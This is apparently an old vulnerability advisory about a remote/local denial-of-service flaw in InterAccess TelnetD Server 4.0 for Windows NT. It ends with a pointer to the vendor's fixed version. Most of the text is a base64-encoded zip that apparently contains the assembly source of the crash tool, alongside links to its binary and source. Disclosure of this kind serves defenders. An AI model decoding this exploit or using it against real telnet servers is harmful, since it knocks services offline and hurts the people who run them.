COMMAND
TelnetD Server
SYSTEMS AFFECTED
InterAccess TelnetD Server Release 4.0 *ALL BUILDS* for WinNT
PROBLEM
UssrLabs found a local/remote DOS Attack. The code that handles
the Terminal client configurations to the Telnet server in the
connection procedure, has an unchecked size that cause the
TelnetD Service Crash.
Binary or source for this D.O.S:
http://www.ussrback.com/telnetd/dostelnetd.exe (binary)
http://www.ussrback.com/telnetd/dostelnetd.zip (Source)
Below is a mimed source:
---
Content-Type: application/octet-stream; name="dostelnd.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="dostelnd.zip"
Content-MD5: Ib556NDhW4WgYN5yHxutug==
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
-----
SOLUTION
There is a FIX for InterAccess TelnetD Server 4.0 on Pragma
Systems Web site
http://www.pragmasys.com/TelnetD
In the left frame select "Get the latest version of InterAccess
TelnetD Product" and download the latest version (if you are a
current user) or "Download InterAccess TelnetD Trial" If you
download this, then you should not encounter the problem.